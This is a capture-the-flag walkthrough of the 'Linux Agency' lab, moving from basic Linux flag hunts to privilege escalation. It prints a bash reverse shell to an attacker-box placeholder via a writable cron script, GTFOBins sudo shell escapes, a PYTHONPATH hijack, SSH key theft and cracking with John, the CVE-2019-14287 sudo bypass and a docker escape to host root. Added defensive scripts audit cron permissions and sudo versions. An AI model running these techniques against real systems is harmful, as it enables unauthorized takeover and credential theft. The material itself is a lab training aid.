
THM Linux Agency

Let’s just jump in

The flag format is username{md5sum}. Based on the information provided, the entire flag is the password for the next question.

Linux Fundamentals

Mission 1

Connect over SSH with the provided SSH username and password and check the MOTD to find the first flag.

Mission 2

Switch user from agent47 to mission1 and list the files in mission1’s home directory (/home/mission1).

Mission 3

Switch user to mission2 and list files. You will find a file called flag.txt. Read its content with cat flag.txt.

Mission 4

Switch user to mission3 and list the files in the home directory. Again we find a flag.txt. Open the file with cat flag.txt: it tells us that the flag was stolen by a thief. Open the file with vi flag.txt instead and we find the grail.

Mission 5

Switch user to mission4 and list the files in the home directory. We find a folder named flag.

cd flag
cat flag.txt

Mission 6

Switch user to mission5 and list the files in the home directory. We find nothing with the basic ls command. Let’s use some ls switches to show hidden files and folders.

ls -al
cat .flag.txt

The -a switch tells ls to show hidden files; the -l switch tells ls to print one line per item (file or folder).

Mission 7

Switch user to mission6 and list the files in the home directory. We find nothing with the basic ls command. Let’s use some ls switches to show hidden files and folders. We find a hidden flag folder. Enter it and list the files with ls.

ls -al
cd .flag
ls
cat flag.txt

Mission 8

Switch user to mission7 and list the files in the home directory. We find a file named flag.txt.

cat flag.txt

Mission 9

Switch user to mission8 and list the files in the home directory. We find nothing, even with the -a switch. Let’s search for the file with the find command.

find / -name flag.txt 2> /dev/null

/ specifies the search scope (the whole filesystem). -name lets us specify the name of the file we are searching for. 2> /dev/null redirects errors (permission denied, for example) to /dev/null to avoid spamming the shell.

Let’s open the file we found with cat /flag.txt.

Mission 10

Switch user to mission9 and list the files in the home directory. We find only one file, rockyou.txt. If you check its size, you can see it is a big file, so let’s grep for the flag pattern to see if the flag is hidden inside.

cat rockyou.txt | grep -i "mission10{"

And the magic happens.

Mission 11

Switch user to mission10 and list the files in the home directory. We find a folder, inside it another set of folders, and inside those yet another set of folders. Let’s run a search to find the flag.

find -name flag.txt

Let’s open the file found inside the nested random folders.

Mission 12

Switch user to mission11 and list the files in the home directory. We find nothing. Let’s try with hidden files and folders. Nothing special to see. Open the hidden files, for example cat .bashrc, and we find a special environment variable named flag with a command associated to it. You can expand the environment variable named flag.

$flag

Mission 13

Switch user to mission12 and list the files in the home directory. We find a flag.txt file. Trying to open it gives permission denied. Let’s look at the permissions of this file with ls -al: no permissions are set on this file, but its owner is the mission12 user, so we can change them. Let’s update the permissions and retry.

chmod +r flag.txt
cat flag.txt

Mission 14

Switch user to mission13 and list the files in the home directory. We find a flag.txt file. Opening it gives an encoded string. We can recognize base64 encoding from the pattern. Let’s decode it.

cat flag.txt | base64 -d

Mission 15

Switch user to mission14 and list the files in the home directory. We find a flag.txt file. Opening it gives an encoded string. We can recognize binary encoding from the pattern. Let’s decode it using the CyberChef website with the From Binary recipe.

cat flag.txt

Mission 16

Switch user to mission15 and list the files in the home directory. We find a flag.txt file. Opening it gives an encoded string. We can recognize hex encoding from the pattern. Let’s decode it using the CyberChef website with the From Hex recipe.

cat flag.txt

Mission 17

Switch user to mission16 and list the files in the home directory. We find a file named flag. It looks like a binary. Let’s make it executable and run it.

chmod +x flag
./flag

Mission 18

Switch user to mission17 and list the files in the home directory. We find a flag.java file. Looking inside confirms it is Java code. Let’s compile it.

javac flag.java

Then run the compiled class to get the result.

java flag

Mission 19

Switch user to mission18 and list the files in the home directory. We find a flag.rb file. Looking inside confirms it is Ruby code. Ruby does not need compilation, so execute the file to get the result.

ruby flag.rb

Mission 20

Switch user to mission19 and list the files in the home directory. We find a flag.c file. Looking inside confirms it is C code. Let’s compile it with gcc.

gcc flag.c

Ignore the compiler warnings. Then execute the compiled binary to get the result.

./a.out

Mission 21

Switch user to mission20 and list the files in the home directory. We find a flag.py file. Looking inside confirms it is Python code. Python does not need compilation, so execute the file to get the result.

python flag.py

Mission 22

Switch user to mission21 and we get a limited shell. Listing the files in the home directory shows nothing. Let’s open a more convenient shell.

/bin/bash

And we receive a new flag.

Mission 23

Switch user to mission22 and we get a Python shell. Let’s escape it and load a bash shell.

import pty; pty.spawn("/bin/bash")

This gives us a bash shell. Go to the home directory, list the files, then open flag.txt.

Mission 24

Switch user to mission23 and list the files in the home directory. We find a message.txt file. Open it to get a hint.

cat message.txt
The hosts will help you.
[OPTIONAL] Maybe you will need curly hairs

Open the hosts file with cat /etc/hosts. We see an alias mapping the mission24.com website to localhost. Let’s try to access it with curl.

curl mission24.com | grep 'mission24'

Mission 25

Switch user to mission24 and list the files in the home directory. We find an executable named bride, but running it gives nothing useful. The file list also contains a .viminfo file, which stores vim’s history from previous editing sessions (command lines, search patterns, marks and register contents).

cat .viminfo | grep mission

Mission 26

Switch user to mission25 and list the files in the home directory. We receive an error from bash:

bash: ls: No such file or directory

We get the same error for every standard Linux command (cat, locate, …). Check whether the PATH variable is set:

echo $PATH

It prints nothing, which confirms that the issue is an empty PATH. Set it back to the usual directories:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Now you can list files, and you will find a flag.txt file containing the flag.

cat flag.txt

Mission 27

Switch user to mission26 and list the files in the home directory. We see a flag.jpg file. Let’s see if we can find the flag with strings.

strings -n 20 flag.jpg
or
strings flag.jpg | grep "mission"

-n 20 tells strings to print only sequences of at least 20 printable characters.

Mission 28

Switch user to mission27 and list the files in the home directory. We find a file with a lot of extensions one after the other. Let’s identify the real type of the file.

file flag.<ext>.gz

The output says it is gzip compressed data. Try the less command on the compressed file.

less flag.<ext>.gz

Mission 29

Switch user to mission28. We get a Ruby shell instead of bash. Let’s escape this Ruby shell and execute a bash shell.

exec '/bin/bash'

Then list the files in the home directory. We spot a txt.galf file; let’s open it and see what is inside.

cat txt.galf

We can see it is the flag, but written backwards. Let’s reverse it.

cat txt.galf | rev

Mission 30

Switch user to mission29 and list the files in the home directory. We find a folder bludit, which looks like a web application. Let’s grep for the flag based on its pattern:

grep -r mission30 bludit/

The -r flag tells grep to search recursively through every folder under bludit/.

Viktor

Switch user to mission30 and list the files in the home directory. We find a folder Escalator with source code inside.

cat sources.py

This is only a print line with no interesting information. Let’s check for hidden files (ls -al) inside this folder: we find a .git folder, which indicates that Escalator is a git repository.

git log

The log lists the recent commits and, bingo, we have a flag.

Privilege Escalation

Dalia

Switch user to viktor and list the files in the home directory, but nothing is interesting. After some reconnaissance, we identify a crontab entry (cat /etc/crontab) that runs a script as dalia, and that script is accessible (writable) by viktor. Let’s put a reverse shell inside this script to get dalia’s flag.

Create a file (reverse.sh) with a reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/<attackIPbox>/1234 0>&1

Following the same approach as the script creation in the crontab, let’s encode the script as base64 and overwrite the current 47.sh script:

cat reverse.sh | base64 -w 0
echo '<base64>' | base64 -d > /opt/scripts/47.sh

On the attack box, run a netcat listener:

netcat -nlp 1234

In the shell you receive, you are connected as dalia (confirm with the id command) and a flag file is available in the home directory.
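The weakness this step abuses is a cron job that runs a script another user can modify. As an added defender-side check, not part of the original writeup, the script below lists every command referenced in a system crontab whose file is group- or world-writable; the crontab, paths and user names in the fixture are constructed for the demonstration.

```shell
#!/bin/sh
# Added defensive check, not part of the original writeup: list the scripts referenced
# by a system crontab that group or others can modify. The Dalia step above abused
# exactly this weakness: a script run by cron as one user but writable by another.

# Print the command path of every real entry in a system crontab.
# System crontab fields: minute hour day month weekday user command...
cron_commands() {
  grep -Ev '^[[:space:]]*#|^[[:space:]]*$|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" \
    | awk '{ print $7 }'
}

# Print each referenced command whose mode grants write access to group or others.
# ls -l mode string layout: type(1) user(2-4) group(5-7) other(8-10); 'w' at 6 or 9.
audit_cron_scripts() {
  for cmd in $(cron_commands "$1"); do
    [ -f "$cmd" ] || continue            # skip missing paths and non-regular files
    mode=$(ls -ld "$cmd" | cut -c1-10)
    case $mode in
      ?????w????|????????w?) echo "$cmd" ;;
    esac
  done
}

# Constructed fixture (made-up paths and user names): a crontab with one safe script
# and one group/world-writable script, so the check has something to find offline.
make_fixture() {
  dir=$(mktemp -d)
  : > "$dir/backup.sh"; chmod 755 "$dir/backup.sh"
  : > "$dir/47.sh";     chmod 777 "$dir/47.sh"
  {
    printf 'SHELL=/bin/sh\n# m h dom mon dow user command\n'
    printf '*/5 * * * * root  %s\n' "$dir/backup.sh"
    printf '* * * * *   dalia %s\n' "$dir/47.sh"
  } > "$dir/crontab"
  echo "$dir"
}

fixture=$(make_fixture)
audit_cron_scripts "$fixture/crontab"    # prints only .../47.sh
```

Run it against the real /etc/crontab (and the files in /etc/cron.d) to spot the same misconfiguration on a system you administer.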

Silvio

As dalia, do some system reconnaissance with, for example, sudo -l. This command confirms that dalia can execute /usr/bin/zip as the silvio user. Check the GTFOBins website to see whether the zip executable can be used to start a new shell as silvio. Based on GTFOBins, execute the following command:

TF=$(mktemp -u)
sudo -u silvio /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'

The shell then looks “blocked” (no prompt), but you can type commands as silvio (confirm with the id command). You can read the flag directly from here or start a new bash with Python:

cat /home/silvio/flag.txt
python3 -c 'import pty;pty.spawn("/bin/bash")'

Reza

As silvio, run sudo -l to check for anything interesting. This command confirms that silvio can execute /usr/bin/git as the reza user. Check the GTFOBins website to see whether the git executable can be used to start a new shell as reza. Based on GTFOBins, execute the following command:

sudo -u reza PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help
cat /home/reza/flag.txt

Jordan

Some analysis as reza with sudo -l shows that reza can execute a specific Python script as the jordan user. Try to execute it:

sudo -u jordan /opt/scripts/Gun-Shop.py

We get an error: the Python module named ‘shop’ is not found. Let’s create this module and pass its location to Python through PYTHONPATH:

mkdir -p /tmp/shop; echo 'import os; os.system("/bin/bash");' > /tmp/shop/shop.py
sudo -u jordan PYTHONPATH=/tmp/shop /opt/scripts/Gun-Shop.py

Then confirm that we have a shell as the jordan user (id) and read the flag. Its content is written backwards, so reverse it, for example in irb (replace 'galf' with the string you read):

cat /home/jordan/flag.txt
irb
'galf'.reverse

Ken

As jordan, run sudo -l to check for anything interesting. This command confirms that jordan can execute /usr/bin/less as the ken user. Check the GTFOBins website to see whether the less executable can be used to start a new shell as ken. Based on GTFOBins, execute the following command:

sudo -u ken /usr/bin/less /etc/os-release

From inside less, type !/bin/bash. This spawns a new bash as the ken user. Recover the flag from ken’s home directory with cat /home/ken/flag.

Sean

As ken, run sudo -l to check for anything interesting. This command confirms that ken can execute /usr/bin/vim as the sean user. Check the GTFOBins website to see whether the vim executable can be used to start a new shell as sean. Based on GTFOBins, execute the following command:

sudo -u sean /usr/bin/vim -c ':!/bin/bash'

This command spawns a shell as sean; you can confirm with the id command.

sean@linuxagency:~$ id
uid=1037(sean) gid=1037(sean) groups=1037(sean),4(adm)

sean is in the adm group, which can read the system logs, so let’s have a look inside /var/log:

grep -r 'sean{' /var/log 2>/dev/null

We find sean’s flag and an interesting base64-encoded string.

Let’s decode this string:

echo '<base64>' | base64 -d

The result is the password of the penelope user. It is easier to resume the analysis directly from this user if we want to take a break.

Penelope

Use the previous password to switch user to penelope (su penelope).

cat /home/penelope/flag.txt

Maya

As penelope, list the files in penelope’s home directory. We find a base64 binary with the SUID bit set, owned by maya. Let’s use GTFOBins to read maya’s flag through this SUID binary:

LFILE=/home/maya/flag.txt
./base64 "$LFILE" | base64 -d

Robert

Switch user to maya (su maya) with the previous flag as password. In maya’s home directory, you will find an old SSH key belonging to the robert user.

Copy the SSH key to your attack box to crack it with John. Start a web server with Python on the target machine:

cd /home/maya/old_robert_ssh
python3 -m http.server 8080

On the attack box, download the file and crack it with the John the Ripper tools:

wget http://<target_ip>:8080/id_rsa
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt --format=ssh

You will have the result quickly (less than 2 minutes).

Let’s use this information to connect as robert:

su robert                                        # does not work
ssh robert@<target_server> -i id_rsa_robert      # does not work

Let’s analyze the server to find another SSH server running:

ss -nlpt

We find a process listening on localhost port 2222 (127.0.0.1:2222). Let’s connect with robert’s SSH key from maya’s shell, using the passphrase recovered earlier:

ssh robert@127.0.0.1 -p 2222 -i id_rsa

List the files in robert’s home directory. Notice that the hostname in the prompt has changed: previously we had “maya@linuxagency:~” and we now have “robert@ec96850005d6”. This new hostname looks like a container environment, which we can confirm by the presence of a .dockerenv file at the root of the filesystem.

Continue analyzing the target to find a way to escape the container. Let’s look at the sudo version to see whether the container is vulnerable to the sudo security bypass (CVE-2019-14287):

sudo --version

The sudo version used inside the container is 1.8.21p2, which is vulnerable to this bypass. Let’s try it:

sudo -u#-1 /bin/bash

-u specifies the user to run the command as. #-1 provides a negative numeric user ID, which is the flaw in this sudo version: since no such user exists, sudo falls back to root (UID 0). /bin/bash is the binary we want to launch as that user.
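CVE-2019-14287 was fixed in sudo 1.8.28 and only matters when a sudoers rule grants a command as any user except root, such as a Runas spec of (ALL, !root). As an added defender-side check, not part of the original writeup, the script below parses the sudo version banner, decides whether it predates the fix, and looks for that rule shape in a sudoers file; the sudoers rule in the sample is made up, the version string is the one seen in the room.

```shell
#!/bin/sh
# Added defensive check, not part of the original writeup: tell whether a sudo version
# falls in the range affected by CVE-2019-14287 (fixed in sudo 1.8.28), and whether a
# sudoers file carries the "(ALL, !root)" style rule the bypass relies on.

# Extract the version from `sudo --version` output, e.g. "1.8.21p2".
parse_sudo_version() {
  printf '%s\n' "$1" | sed -En '1s/^Sudo version ([0-9][0-9.]*(p[0-9]+)?).*/\1/p'
}

# Return 0 (true) when the version is older than 1.8.28.
# The pN suffix is a patch level that does not change the fix status, so it is dropped.
sudo_version_affected() {
  set -- $(printf '%s\n' "$1" | sed -E 's/p[0-9]+$//' | tr '.' ' ')
  major=${1:-0}; minor=${2:-0}; patch=${3:-0}
  [ "$major" -lt 1 ] && return 0
  [ "$major" -gt 1 ] && return 1
  [ "$minor" -lt 8 ] && return 0
  [ "$minor" -gt 8 ] && return 1
  [ "$patch" -lt 28 ]
}

# Return 0 when a sudoers file lets a user run something as anyone except root.
# The -u#-1 bypass only matters when the Runas list is ALL with root excluded.
sudoers_has_negated_root() {
  grep -Eq '\([[:space:]]*ALL[[:space:]]*,[[:space:]]*!root[[:space:]]*\)' "$1"
}

# Constructed samples: the banner matches the version seen in the room; the sudoers
# rule is made up (the room's real sudoers content is not shown in the writeup).
SAMPLE_SUDO_OUTPUT='Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2'

make_sample_sudoers() {
  f=$(mktemp)
  printf 'bob ALL=(ALL, !root) NOPASSWD: /usr/bin/vi\n' > "$f"
  echo "$f"
}

ver=$(parse_sudo_version "$SAMPLE_SUDO_OUTPUT")
if sudo_version_affected "$ver" && sudoers_has_negated_root "$(make_sample_sudoers)"; then
  echo "sudo $ver with an (ALL, !root) rule: affected by CVE-2019-14287"
fi
```

On a live system, feed it the real `sudo --version` output and /etc/sudoers (plus /etc/sudoers.d/*); either upgrading past 1.8.28 or removing the negated-root rule closes the gap.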

We now have root access inside the container, which lets us recover the user.txt flag.

cat /root/user.txt

Let’s escape from the container to find the root flag. On the GTFOBins website (docker entry), there is a way to run an interactive shell that escapes the container. First identify the image used inside the container with the docker ps command, then spawn the interactive system shell outside the container:

/tmp/docker ps
/tmp/docker run -v /:/mnt --rm -it mangoman chroot /mnt sh

/tmp/docker is the location of the docker binary inside the container. run launches a new container. -v /:/mnt mounts the host’s / filesystem at /mnt inside that container. --rm -it removes the container on exit and gives an interactive session. mangoman is the current (and only) image available. chroot /mnt sh executes a shell rooted in the mounted host filesystem.

Confirm that we are now root on the base system with the id command and read the root.txt flag with cat /root/root.txt.

This post is licensed under CC BY 4.0 by the author.